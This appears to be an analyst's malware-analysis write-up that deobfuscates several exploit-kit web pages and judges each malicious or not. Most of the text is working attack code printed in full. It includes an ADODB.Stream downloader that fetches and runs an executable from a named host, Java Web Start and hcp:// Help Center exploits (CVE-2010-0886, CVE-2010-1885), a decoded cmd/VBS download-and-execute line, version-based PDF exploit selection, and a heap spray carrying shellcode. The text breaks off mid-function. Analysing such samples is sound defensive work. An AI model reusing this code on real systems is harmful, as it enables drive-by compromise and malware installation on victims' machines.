Web Malware

 

1] 2.htm

 

After deobfuscation:

var url, path;

url = “http://x.x5k.info/x.css”;

path = “C:\\boot.exe”;

try {

var ado = (document.createElement(“object”));

var d = 1;

ado.setAttribute(“classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36”);

var e = 1;

var xml = ado.CreateObject(“Microsoft.XMLHTTP”, “”);

var f = 1;

var ab = “Adodb.”;

var cd = “Stream”;

var g = 1;

var as = ado.createobject(ab + cd, “”);

var h = 1;

xml.Open(“GET”, url, 0);

xml.Send();

as.type = 1;

var n = 1;

as.open();

as.write(xml.responseBody);

as.savetofile(path, 2);

as.close();

var shell = ado.createobject(“Shell.Application”, “”);

shell.ShellExecute(path, “”, “”, “open”, 0)

}

catch (e){

}

;

var url, path;

url = “http://x.x5k.info/x.css”;

path = “C:\\boot.exe”;

try {

var ado = (document.createElement(“object”));

var d = 1;

ado.setAttribute(“classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36”);

var e = 1;

var xml = ado.CreateObject(“Microsoft.XMLHTTP”, “”);

var f = 1;

var ab = “Adodb.”;

var cd = “Stream”;

var g = 1;

var as = ado.createobject(ab + cd, “”);

var h = 1;

xml.Open(“GET”, url, 0);

xml.Send();

as.type = 1;

var n = 1;

as.open();

as.write(xml.responseBody);

as.savetofile(path, 2);

as.close();

var shell = ado.createobject(“Shell.Application”, “”);

shell.ShellExecute(path, “”, “”, “open”, 0)

}

catch (e){

}

;

the above is reapeted hence twice.

This uses AdoDbStream (ActiveX Data Object Database Stream) over RDS (Remote Data Stream ) and uses the msxmlhttps fucntions to download the stream to a file that will

be created in the C:/d drive by the name of boot.exe. It uses string concatenation to build names like AdoDb+Stream. Ht ehardcoded uri on deobfuscation in the debugger, is

passed to the xml.Open function which is taking hte GET paramet , the url and the offset to download from. Further the AdoDB Stream parameters like type is set to 1.

At the outset, an document element by the nae of “object” is created using createElement() DOM function. further the objec newly created is given the attribute of a classid to the

above seen value. Furhter objects are created with the documnet instantce of ado- “Microsoft.XMLHTTP”.

The savetofile() fuinction saves the downloaded stream of bytes to the file boot.exe. Another document object is created with the nameShell.Application, and this instance is used

to execut the downloaded file boot.exe, using ShellExecute().

The uri-http://x.x5k.info/x.css is listed in the malware domain list as.

2010/12/19_16:35 x.x5k.info/x.css 61.164.149.106 X5K.INFO@domainsbyproxy.com

Result Malicious.

2] Suspended.htm

Not malicious.

3] http://www.bmwdiscounts.com.au.htm

Not malicious.

4] pic.php

clip_image002

The whole deobfuscated code is shown below:

var provl = String.fromCharCode

function end_redirect(){

}

;

document.write(”

<body><style type=’text/css’>.css {behavior: url(#default#userData);}</style><MARQUEE i

d=’mrq’ class=’css’></MARQUEE></body>”);

This embeds the pdf in the HTML document , using the classid.

function ewvf(){ //this fuction is a holder which calls another functions, zazo which is used to execute the vulnerability exploit given below.

zazo();

}

;

function zazo(){

try {

var cg =

“http: -J-jar -J\\\\178.162.174.42\\pub\\new.avi http://fotu.cz.cc/d.php?f=16&e=1 none”

;

This is the jws commandline injection vulnerability.

JWS command-line injection Java Web Start Arbitrary command-line injection CVE-2010-0886

(Candidature Status).

This avi file is the first payload.

if (window.navigator.appName == ‘Microsoft Internet Explorer’){

try {

var uiu = document.createElement(‘OBJECT’);

uiu.classid = ‘clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA’;

uiu.launch(cg); //launches “http: -J-jar -J\\\\178.162.174.42\\pub\\new.avi http://fotu.cz.cc/d.php?f=16&e=1 none”

using dynamic versioning using the clsid to pre-approve activex execution.

}

Java JRE deploytk.dll ActiveX Control Multiple BOF Vulnerabilities

Overview: This host is installed with Java JRE Deployment Toolkit ActiveX and

is prone to multiple buffer overflow vulnerabilities.

catch (e){

var ghtb = document.createElement(‘OBJECT’);

ghtb.classid = ‘clsid:8AD9C840-044E-11D1-B3E9-00805F499D93’;

ghtb.launch(cg); // By using classid=”clsid:8AD9C840-044E-11D1-B3E9-00805F499D93″ , the latest installed version of the Java plug-in is used. This is to mitigate andy exception.

}

}

else {

var uiu = document.createElement(‘OBJECT’);

var ze = document.createElement(‘OBJECT’);

uiu.type = ‘application/npruntime-scriptable-plugin;deploymenttoolkit’;

ze.type = ‘application/java-deployment-toolkit’;

document.body.appendChild(uiu);

document.body.appendChild(ze);

try {

uiu.launch(cg); //else invokes the java deployment toolkit prior to the launching.

}

catch (e){

ze.launch(cg);

}

}

}

catch (e){

}

;

ai(); //calls function ai(), which iuses the said hcp exploit, to launch another obfuscated javascipt.

}

;

function ai(){

var bh = ”

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A

%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A

%%A%%A%%A

%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A

%%A%%A%%A

%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A

%%A%%A%%A

%%A..%5C..%5Csysinfomain.htm%u003fsvr=<scr” + ”

ipt defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,1

08,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,

77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44

,34,104,116,116,112,58,47,47,102,111,116,117,46,99,122,46,99,99,47,101,120,112,108,111,105

,116,115,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,49,54,34,44,102,97,108,115,1

01,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,10

6,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,

109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,1

20,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,

40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46

,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,6

7,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112

,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,10

8,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37

,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32

,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,

120,101)));</scr” + “ipt>”;

var m = document.createElement(‘iframe’);

m.setAttribute(‘src’, bh);

m.setAttribute(‘width’, 0);

m.setAttribute(‘height’, 0);

m.setAttribute(‘frameborder’, ‘0’);

document.body.appendChild(m);

dsfgsdfh();

}

;

This is the hcp exploit which uses the help center service and passes malicious code for local execution from the query strings.

Hcp URL Help Center URL Validation Vulnerability CVE-2010-1885

(Candidature Status)

function dsfgsdfh(){

try {

function addp(src){

var p = document.createElement(‘iframe’);

p.setAttribute(‘src’, src);

p.setAttribute(‘width’, 0);

p.setAttribute(‘height’, 0);

p.setAttribute(‘frameborder’, ‘0’);

document.body.appendChild(p);

}

var PluginDetect = {

handler : function (c, b, a){

return function (){

c(b, a)

}

}

, isDefined : function (b){

return typeof b != “undefined”

}

, isArray : function (b){

return (b && b.constructor === Array)

}

, isFunc : function (b){

return typeof b == “function”

}

, isString : function (b){

return typeof b == “string”

}

, isNum : function (b){

return typeof b == “number”

}

, isStrNum : function (b){

return (typeof b == “string” && (/\d/).test(b))

}

, getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g,

getNum : function (b, c){

var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx

).exec(b) : null;

return a ? a[0].replace(d.splitNumRegx, “,”) : null

}

, compareNums : function (h, f, d){

var e = this , c, b, a, g = parseInt;

if (e.isStrNum(h) && e.isStrNum(f)){

if (e.isDefined(d) && d.compareNums){

return d.compareNums(h, f)

}

c = h.split(e.splitNumRegx);

b = f.split(e.splitNumRegx);

for (a = 0; a < Math.min(c.length, b.length);

a ++ ){

if (g(c[a], 10) > g(b[a], 10)){

return 1

}

if (g(c[a], 10) < g(b[a], 10)){

return – 1

}

}

}

return 0

}

, formatNum : function (b, c){

var d = this , a, e;

if (!d.isStrNum(b)){

return null

}

if (!d.isNum(c)){

c = 4

}

c–;

e = b.replace(/\s/g, “”).split(d.splitNumRegx).concat([“0”, “0”, “0”, “0”]);

for (a = 0; a < 4; a ++ ){

if (/^(0+)(.+)$/.test(e[a])){

e[a] = RegExp.$2

}

if (a > c ||! (/\d/).test(e[a])){

e[a] = “0”

}

}

return e.slice(0, 4).join(“,”)

}

, $$hasMimeType : function (a){

return function (d){

if (!a.isIE){

var c, b, e, f = a.isString(d) ? [d] : d;

for (e = 0; e < f.length; e ++ ){

if (/[^\s]/.test(f[e]) && (c = navigator.mimeTypes[f[e]]) && (b = c.

enabledPlugin) && (b.name || b.description)){

return c

}

}

}

return null

}

}

, findNavPlugin : function (l, e, c){

var j = this , h = new RegExp(l, “i”), d = (!j.isDefined(e) || e) ?/\ d /: 0, k =

c ? new RegExp(c, “i”) : 0, a = navigator.plugins, g = “”, f, b, m;

for (f = 0; f < a.length; f ++ ){

m = a[f].description || g;

b = a[f].name || g;

if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (

h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){

if (!k ||! (k.test(m) || k.test(b))){

return a[f]

}

}

}

return null

}

, getMimeEnabledPlugin : function (a, e){

var d = this , b, c = new RegExp(e, “i”);

if ((b = d.hasMimeType(a)) && (b = b.enabledPlugin) && (c.test(b.description || “”

) || c.test(b.name || “”))){

return b

}

return 0

}

, getPluginFileVersion : function (f, b){

var h = this , e, d, g, a, c =- 1;

if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){

return b

}

if (!b){

return e

}

e = h.formatNum(e);

b = h.formatNum(b);

d = b.split(h.splitNumRegx);

g = e.split(h.splitNumRegx);

for (a = 0; a < d.length; a ++ ){

if (c >- 1 && a > c && d[a] != “0”){

return b

}

if (g[a] != d[a]){

if (c ==- 1){

c = a

}

if (d[a] != “0”){

return b

}

}

}

return e

}

, AXO : window.ActiveXObject, getAXO : function (b, a){

var g = null, f, d = false, c = this ;

try {

g = new c.AXO(b);

d = true

}

catch (f){

}

if (c.isDefined(a)){

deleteg;

return d

}

return g

}

, convertFuncs : function (f){

var a, g, d, b =/^ [ \ $][ \ $] /, c = {

}

;

for (ain f){

if (b.test(a)){

c[a] = 1

}

}

for (ain c){

try {

g = a.slice(2);

if (g.length > 0 &&! f[g]){

f[g] = f[a](f)

}

}

catch (d){

}

}

}

, initScript : function (){

var c = this , a = navigator, d = “/”, h = a.userAgent || “”, f = a.vendor || “”,

b = a.platform || “”, g = a.product || “”;

c.OS = (/win/i).test(b) ? 1 : ((/mac/i).test(b) ? 2 : ((/linux/i).test(b) ? 3 : 4

));

c.convertFuncs(c);

c.isIE = new Function(“return ” + d + “*@cc_on!@*” + d + “false”)();

c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(h) ? parseFloat(RegExp.$1, 10) :

null ;

c.ActiveXEnabled = false;

if (c.isIE){

var e, i = [“Msxml2.XMLHTTP”, “Msxml2.DOMDocument”, “Microsoft.XMLDOM”,

“ShockwaveFlash.ShockwaveFlash”, “TDCCtl.TDCCtl”, “Shell.UIHelper”,

“Scripting.Dictionary”, “wmplayer.ocx”];

for (e = 0; e < i.length; e ++ ){

if (c.getAXO(i[e], 1)){

c.ActiveXEnabled = true;

break

}

}

c.head = c.isDefined(document.getElementsByTagName) ? document.

getElementsByTagName(“head”)[0] : null

}

c.isGecko = (/Gecko/i).test(g) && (/Gecko\s*\/\s*\d/i).test(h);

c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(h) ? RegExp.

$1 : “0.9”) : null;

c.isSafari = (/Safari\s*\/\s*\d/i).test(h) && (/Apple/i).test(f);

c.isChrome = (/Chrome\s*\/\s*\d/i).test(h);

c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(h);

c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(h) || 1) ?

parseFloat(RegExp.$1, 10) : null;

c.addWinEvent(“load”, c.handler(c.runWLfuncs, c))

}

, init : function (d, a){

var c = this , b;

if (!c.isString(d)){

return – 3

}

if (d.length == 1){

c.getVersionDelimiter = d;

return – 3

}

b = c[d.toLowerCase().replace(/\s/g, “”)];

if (!b ||! b.getVersion){

return – 3

}

c.plugin = b;

if (!c.isDefined(b.installed) || a == true){

b.installed = b.version = b.version0 = b.getVersionDone = null;

b.$ = c

}

c.garbage = false;

if (c.isIE &&! c.ActiveXEnabled){

if (b !== c.java){

return – 2

}

}

return 1

}

, fPush : function (b, a){

var c = this ;

if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0

])))){

a[a.length] = b

}

}

, callArray : function (b){

var c = this , a;

if (c.isArray(b)){

for (a = 0; a < b.length; a ++ ){

if (b[a] === null){

return

}

c.call(b[a]);

b[a] = null

}

}

}

, call : function (c){

var b = this , a = b.isArray(c) ? c.length :- 1;

if (a > 0 && b.isFunc(c[0])){

c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)

}

else {

if (b.isFunc(c)){

c(b)

}

}

}

, $$isMinVersion : function (a){

return function (h, g, d, c){

var e = a.init(h), f, b =- 1;

if (e < 0){

return e

}

f = a.plugin;

g = a.formatNum(a.isNum(g) ? g.toString() : (a.isString(g) ? a.getNum(g) : “0”

));

if (!a.isStrNum(g)){

return – 3

}

if (f.getVersionDone != 1){

f.getVersion(d, c);

if (f.getVersionDone === null){

f.getVersionDone = 1

}

}

a.cleanup();

if (f.installed !== null){

b = f.installed <= 0.5 ? f.installed : (f.version === null ? 0 : (a.

compareNums(f.version, g, f) >= 0 ? 1 :- 1))

}

return b

}

}

, getVersionDelimiter : “,”, $$getVersion : function (a){

return function (g, d, c){

var e = a.init(g), f, b;

if (e < 0){

return null

}

f = a.plugin;

if (f.getVersionDone != 1){

f.getVersion(d, c);

if (f.getVersionDone === null){

f.getVersionDone = 1

}

}

a.cleanup();

b = (f.version || f.version0);

return b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b

}

}

, cleanup : function (){

}

, addWinEvent : function (d, c){

var e = this , a = window, b;

if (e.isFunc(c)){

if (a.addEventListener){

a.addEventListener(d, c, false)

}

else {

if (a.attachEvent){

a.attachEvent(“on” + d, c)

}

else {

b = a[“on” + d];

a[“on” + d] = e.winHandler(c, b)

}

}

}

}

, winHandler : function (d, c){

return function (){

d();

if (typeof c == “function”){

c()

}

}

}

, WLfuncs : [0], runWLfuncs : function (a){

a.winLoaded = true;

a.callArray(a.WLfuncs);

if (a.onDoneEmptyDiv){

a.onDoneEmptyDiv()

}

}

, winLoaded : false, $$onWindowLoaded : function (a){

return function (b){

if (a.winLoaded){

a.call(b)

}

else {

a.fPush(b, a.WLfuncs)

}

}

}

, div : null, divWidth : 50, pluginSize : 1, emptyDiv : function (){

var c = this , a, e, b, d = 0;

if (c.div && c.div.childNodes){

for (a = c.div.childNodes.length – 1; a >= 0; a — ){

b = c.div.childNodes[a];

if (b && b.childNodes){

if (d == 0){

for (e = b.childNodes.length – 1; e >= 0; e — ){

b.removeChild(b.childNodes[e])

}

c.div.removeChild(b)

}

else {

}

}

}

}

}

, onDoneEmptyDiv : function (){

var a = this ;

if (!a.winLoaded){

return

}

if (a.WLfuncs && a.WLfuncs.length > 0 && a.isFunc(a.WLfuncs[a.WLfuncs.length – 1

])){

return

}

if (a.java){

if (a.java.OTF == 3){

return

}

if (a.java.funcs && a.java.funcs.length > 0 && a.isFunc(a.java.funcs[a.java.

funcs.length – 1])){

return

}

}

a.emptyDiv()

}

, getObject : function (c, a){

var g, d = this , f = null, b = d.getContainer(c);

try {

if (b && b.firstChild){

f = b.firstChild

}

if (a && f){

f.focus()

}

}

catch (g){

}

return f

}

, getContainer : function (a){

return (a && a[0] ? a[0] : null)

}

, instantiate : function (j, c, g, a, k){

var m, n = document, i = this , r, q = n.createElement(“span”), o, h, f = “<“;

var l = function (t, s){

var v = t.style, d, u;

if (!v){

return

}

v.outline = “none”;

v.border = “none”;

v.padding = “0px”;

v.margin = “0px”;

v.visibility = “visible”;

if (i.isArray(s)){

for (d = 0; d < s.length; d = d + 2){

try {

v[s[d]] = s[d + 1]

}

catch (u){

}

}

return

}

}

, b = function (){

var t, u = “pd33993399”, s = null, d = (n.getElementsByTagName(“body”)[0] || n.

body);

if (!d){

try {

n.write(f + ‘div id=”‘ + u + ‘”>o’ + f + “/div>”);

s = n.getElementById(u)

}

catch (t){

}

}

d = (n.getElementsByTagName(“body”)[0] || n.body);

if (d){

if (d.firstChild && i.isDefined(d.insertBefore)){

d.insertBefore(i.div, d.firstChild)

}

else {

d.appendChild(i.div)

}

if (s){

d.removeChild(s)

}

}

else {

}

}

;

if (!i.isDefined(a)){

a = “”

}

if (i.isString(j) && (/[^\s]/).test(j)){

r = f + j + ‘ width=”‘ + i.pluginSize + ‘” height=”‘ + i.pluginSize + ‘” ‘;

for (o = 0; o < c.length; o = o + 2){

if (/[^\s]/.test(c[o + 1])){

r += c[o] + ‘=”‘ + c[o + 1] + ‘” ‘

}

}

r += “>”;

for (o = 0; o < g.length; o = o + 2){

if (/[^\s]/.test(g[o + 1])){

r += f + ‘param name=”‘ + g[o] + ‘” value=”‘ + g[o + 1] + ‘” />’

}

}

r += a + f + “/” + j + “>”

}

else {

r = a

}

if (!i.div){

i.div = n.createElement(“div”);

h = n.getElementById(“plugindetect”);

if (h){

i.div = h

}

else {

i.div.id = “plugindetect”;

b()

}

l(i.div, [“width”, i.divWidth + “px”, “height”, (i.pluginSize + 3) + “px”,

“fontSize”, (i.pluginSize + 3) + “px”, “lineHeight”, (i.pluginSize + 3) + “px”,

“verticalAlign”, “baseline”, “display”, “block”]);

if (!h){

l(i.div, [“position”, “absolute”, “right”, “0px”, “top”, “0px”])

}

}

if (i.div && i.div.parentNode){

i.div.appendChild(q);

l(q, [“fontSize”, (i.pluginSize + 3) + “px”, “lineHeight”, (i.pluginSize + 3) +

“px”, “verticalAlign”, “baseline”, “display”, “inline”]);

try {

if (q && q.parentNode){

q.focus()

}

}

catch (m){

}

try {

q.innerHTML = r

}

catch (m){

}

if (q.childNodes.length == 1 &&! (i.isGecko && i.compareNums(i.verGecko,

“1,5,0,0”) < 0)){

l(q.firstChild, [“display”, “inline”])

}

return [q]

}

return [null]

}

, adobereader : {

mimeType : “application/pdf”, navPluginObj : null, progID : [“AcroPDF.PDF”,

“PDF.PdfCtrl”], classID : “clsid:CA8A9780-280D-11CF-A24D-444553540000”, INSTALLED :

{//the settings pertaining to the instatltion of pdf files ar set her.

}

, pluginHasMimeType : function (d, c, f){

var b = this , e = b.$, a;

for (ain d){

if (d[a] && d[a].type && d[a].type == c){

return 1

}

}

if (e.getMimeEnabledPlugin(c, f)){

return 1

}

return 0

}

, getVersion : function (i){

var f = this , c = f.$, g, d, j, l = p = null, h = null, k = null, a, b;

i = (c.isString(i) && i.length) ? i.replace(/\s/, “”).toLowerCase() : f.mimeType

;

if (c.isDefined(f.INSTALLED[i])){

f.installed = f.INSTALLED[i];

return

}

if (!c.isIE){ //does checks for the case when IE is not installed, and tries to get the mime type.

a = “Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in”;

if (f.getVersionDone !== 0){

f.getVersionDone = 0;

p = c.getMimeEnabledPlugin(f.mimeType, a);

if (!p && c.hasMimeType(f.mimeType)){

p = c.findNavPlugin(a, 0)

}

if (p){

f.navPluginObj = p;

h = c.getNum(p.description) || c.getNum(p.name);

h = c.getPluginFileVersion(p, h);

if (!h && c.OS == 1){

if (f.pluginHasMimeType(p, “application/vnd.adobe.pdfxml”, a)){

h = “9”

}

else {

if (f.pluginHasMimeType(p, “application/vnd.adobe.x-mars”, a)){

h = “8”

}

}

}

}

}

else {

h = f.version

}

l = c.getMimeEnabledPlugin(i, a);

f.installed = l && h ? 1 : (l ? 0 : (f.navPluginObj ?- 0.2 :- 1))

}

else {

p = c.getAXO(f.progID[0]) || c.getAXO(f.progID[1]);

b =/=\ s * ([ \ d \ .] + ) / g;

try {

d = (p || c.getObject(c.instantiate(“object”, [“classid”, f.classID], [“src”

, “”], “”, f))).GetVersions();

for (j = 0; j < 5; j ++ ){

if (b.test(d) && (!h || RegExp.$1 > h)){

h = RegExp.$1

}

}

}

catch (g){

}

f.installed = h ? 1 : (p ? 0 :- 1)

}

if (!f.version){

f.version = c.formatNum(h)

}

f.INSTALLED[i] = f.installed

}

}

, zz : 0

}

;

PluginDetect.initScript();

PluginDetect.getVersion(‘.’);

var inp = PluginDetect.getVersion(‘AdobeReader’).split(‘.’);

var sv = parseInt(inp[0] + inp[1] + inp[2]); //sets the AdobeReader version to download from the location based on the int number gained from the combination of the 3 array indexes. The range precludes the validation criteria for downloading souce.

if (sv < 800){

addp(‘./exploits/pdf.php?f=16’);

}

else if ((sv >= 800) && (sv < 931)){

addp(‘./exploits/pdf2.php?f=16’);

}

}

catch (e){

}

;

setTimeout(asgsaf, 4000); //4seconds

}

;

function asgsaf(){

setTimeout(end_redirect, 3000); //sets the redirect sleeps to 3 seconds.

}

;

ewvf(); //the function at the beginning used to launch the java malcode exploit is called again after the web browsers are enumerated and the operating systems are checked-Win, Mac and Linux are checked. Accordingly, several nested functions are fired whch act as regex string parsers and specifically built he required commands for installation if the javatoolkit. After the browser and OS specific handlers are invoked. Then the function below is called once again. It also check s for the plugin versions of adobereader amd appends the exploit url query stings. It checks for Gecko Version -1,5,0,0, which pertains to the web browser core api engine.

clip_image004

The charCode to Ascii convertor show the decoded ascii strings which are in effect the mal-code below:

cmd /c echo B=”l.vbs”:With CreateObject(“MSXML2.XMLHTTP”):.open “GET”,”http://fotu.cz.cc/exploits/hcp_vbs.php?f=16&#8243;,false:.send():Set A = CreateObject(“Scripting.FileSystemObject”):Set D=A.CreateTeŒ2) + “\” + B):D.WriteLine .responseText:End With:D.Close:CreateObject(“WScript.Shell”).Run A.GetSpecialFolder(2) + “\” + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe

This opens the commandline and passes the 1.vbs script which acts as the holder of script from http://fotu.cz.cc/exploits/hcp_vbs.php?f=16“, using GET http method over tcp, following which a filesystem object is created, using CreateObject. This follows with the execution of the script using WScript.Shell parameter which in effect launches the windows scripting host. The %TEMP % folder is the download location along with ta taskkill command to the windows help center process.

RESULT:Malicious.

 

 

5] Index.php

 

clip_image006

After manual deobfuscation we get the following:

function b_0_p_f(M4_gMDT){

if (navigator.userAgent.toLowerCase().indexOf(M4_gMDT) > – 1){

return 1;

}

return 0;

}

function xGo_3__3(wA_w_Vy){

try {

var obj = new ActiveXObject(wA_w_Vy);

if (obj){

return true;

}

}

catch (e){

return false;

}

}

function hQwqbnZ(){//sets the version numbers to be used later.

var n4__s_B = [0, 0, 0];

if (b_0_p_f(“msie”)){

try {

var L_j1_nU = new ActiveXObject(‘ShockwaveFlash.ShockwaveFlash’).GetVariable(

‘$version’);

L_j1_nU = L_j1_nU.split(“,”);

n4__s_B[0] = L_j1_nU[0].replace(/\D/g, “”);

n4__s_B[1] = L_j1_nU[1].replace(/\D/g, “”);

n4__s_B[2] = L_j1_nU[2].replace(/\D/g, “”);

}

catch (e){

}

}

else {

try {

var XB__We = navigator.plugins[“Shockwave Flash”].description.replace(

/([a-zA-Z]|\s)+/, “”).replace(/(\s+r|\s+b[0-9]+)/, “.”).split(“.”);

n4__s_B[0] = XB__We[0].replace(/\D/g, “”);

n4__s_B[1] = XB__We[1].replace(/\D/g, “”);

n4__s_B[2] = XB__We[2].replace(/\D/g, “”);

}

catch (e){

}

}

return n4__s_B;

}

function a61tq_(){

var O__zw_u = 0;

if (b_0_p_f(“msie”)){

try {

if (xGo_3__3(‘AcroPDF.PDF’) || xGo_3__3(‘PDF.PdfCtrl’)){

O__zw_u = 1;

}

}

catch (e){

}

}

else {

try {

for (GNQQdvp = 0; GNQQdvp < navigator.plugins.length; GNQQdvp ++ ){

if (navigator.plugins[GNQQdvp].description.indexOf(‘Adobe Acrobat’) > – 1 ||

navigator.plugins[GNQQdvp].description.indexOf(‘Adobe PDF’) > – 1){

O__zw_u = 1;

}

}

}

catch (e){

}

}

return O__zw_u;

}

function dRbrXL(mQRn_WTG){

var NIOq_bS = document.createElement(‘iframe’);

NIOq_bS.setAttribute(‘src’, mQRn_WTG);

NIOq_bS.setAttribute(‘width’, 200);

NIOq_bS.setAttribute(‘height’, 200);

document.body.appendChild(NIOq_bS);

return ;

}

function R__fEa(){

var Og_hgt;

var H_wGTyd = unescape(‘%u0808%u0808’);

var M___ey_ = unescape(”

%u9c60%uec81%u0200%u0000%u00e8%u0000%u5d00%uc581%u011a%u0000%uc031%u8b64%u1840%u408b%u8b30

%u0c40%u788d%u8b1c%u8b3f%u2077%ud231%u05eb%uc2c1%u3007%u66c2%u24ad%u75df%u81f5%ubcf2%u5367

%u756f%u8be4%u085f%u758d%ue800%u007e%u0000%ue789%u758d%ue814%u00c8%u0000%uff57%u0055%uc389

%u758d%ue80c%u0066%u0000%u758d%ue820%u00b2%u0000%uc031%uc983%uf2ff%u4fae%ue389%u758d%ue83a

%u00a0%u0000%uc031%u0738%u3d74%u5746%ubc8d%u0024%u0001%u8900%u5007%u6850%u0100%u0000%u5357

%uff50%u0c55%uc009%u1e75%u488d%u2954%u57cf%uaaf3%u578d%uc7bc%u4402%u0000%u5200%u5050%u206a

%u5050%u5050%uff57%u0455%ueb5f%u81b8%u00c4%u0002%u9d00%uc361%ueb56%ue808%u000a%u0000%u4689

%uadfc%uc009%uf375%uc35e%u5756%uc189%u438b%u8b3c%u037c%u0178%u8bdf%u2077%ude01%uad56%ud801

%ud231%uc2c1%u3207%u4010%u3880%u7500%u31f5%u75ca%u58ec%uc629%ueed1%u7703%u0f24%u44b7%ufe33

%ue0c1%u0302%u1c47%u048b%u0103%u5fd8%uc35e%u8a57%u4606%u0632%u75aa%u5ffa%u26c3%uac80%uc7c8

%u318a%u0046%u0000%u2900%ucc1b%u002f%u0000%ud500%u0780%u011e%u0102%u6a60%u0008%ue14c%u1c89

%u0400%u154a%u4e00%u000d%u0618%u0713%u4800%u1f5a%u5b44%u1611%u5b07%ufb2f%u0397%u050e%u5e4a

%u1818%u594f%u0c5b%u4317%u0f58%u8d32%u03e1%u050e%u5e4a%u1818%u594f%u0f5b%u4314%u0f58%u9f32

%u03f3%u050e%u5e4a%u1818%u594f%u0e5b%u4315%u0f58%ub132%u00b1″);

//A heapspray is beign implemented here:

while (H_wGTyd.length <= 0x10000 / 2)H_wGTyd += H_wGTyd;

H_wGTyd = H_wGTyd.substring(0, 0x10000 / 2 – M___ey_.length);

Og_hgt = new Array();

for (GNQQdvp = 0; GNQQdvp < 0x1200; GNQQdvp ++ ){

Og_hgt[GNQQdvp] = H_wGTyd + M___ey_;

}

}

The converted shellcode from the hex bytes give us a Silvana malware (Downloader).

Notice how it specifies the length of the shellcode to run within the file.

A LorPE effected Silvana. The string is found in the section header.

clip_image008

clip_image010

The embedded shellcode results in the same executable.

This downloads from a malicious site-http://www.porno2top.tk/www/load.php?f=1&e=2

function G__Hg_F(){

try {

var d6_V_jT =

“http: -J-jar -J\\\\91.193.194.80\\public\\a729d76292a6a72fc99598bbc1e33ae6.mp4 none”;

JWS command-line injection Java Web Start Arbitrary command-line injection CVE-2010-088

if (b_0_p_f(“msie”)){

try {

var v7_J_qaW = document.createElement(‘OBJECT’);

v7_J_qaW.classid = ‘clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA’;

v7_J_qaW.launch(d6_V_jT);

}

catch (e){

var VPV5G_y = document.createElement(‘OBJECT’);

VPV5G_y.classid = ‘clsid:8AD9C840-044E-11D1-B3E9-00805F499D93’;

VPV5G_y.launch(d6_V_jT);

}

}

else {

var v7_J_qaW = document.createElement(‘OBJECT’);

var CG_SWfd = document.createElement(‘OBJECT’);

v7_J_qaW.type = ‘application/npruntime-scriptable-plugin;deploymenttoolkit’;

CG_SWfd.type = ‘application/java-deployment-toolkit’;

document.body.appendChild(v7_J_qaW);

document.body.appendChild(CG_SWfd);

try {

v7_J_qaW.launch(d6_V_jT);

}

catch (e){

CG_SWfd.launch(d6_V_jT);

}

}

}

catch (e){

}

}

function piI__lYm(){ // this function downloads the adodbStream to this file.

var y_Q2__EU = ‘.//..//BAh_ci.exe’;

var natf_w_ = ‘responseBody’;

var CtHBMYs = document.createElement(‘object’);

CtHBMYs.setAttribute(‘id’, ‘CtHBMYs’);

CtHBMYs.setAttribute(‘classid’, ‘clsid:BD96C556-65A3-11D0-983A-00C04FC29E36’);

try {

var Fxqx_lk = CtHBMYs[‘CreateObject’](‘msxml2.xmlhttp’, “”);

var q_dDn_XI = CtHBMYs[‘CreateObject’](‘shell.application’, “”);

